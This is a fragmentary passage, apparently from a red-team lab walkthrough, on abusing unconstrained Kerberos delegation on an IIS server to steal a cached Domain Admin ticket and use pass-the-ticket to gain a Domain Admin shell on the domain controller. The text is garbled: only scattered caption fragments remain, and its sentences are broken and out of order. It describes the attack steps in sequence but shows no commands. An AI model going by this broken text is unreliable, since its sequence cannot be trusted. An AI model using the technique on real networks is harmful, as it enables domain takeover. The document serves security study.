User--- authenticates to --->
IIS server---> authenticates on behalf of the user --->
IIS01unrestricted kerberos delegation privilege:
TrustedForDelegationfield set to
$true- we are good to attack:
offense\administrator(Domain Admin) just yet.
DC01host from the context of offense\administrator:
HTTP 200 OKresponse:
IIS01for new kerberos tickets in memory:
pass-the-ticketattack and become a DA, let's try PSRemoting to the
IIS01and check currently available kerberos tickets in a current logon session - just to make sure we currently do not have DA rights:
IIS01system now contains a
krbtgtfor offense\administrator, which enables this session to access
DC01C$ share and establish a PSSession with an interactive shell with Domain admin privileges.
offense\delegateaccessing a share on
IIS01- the TGT gets cached: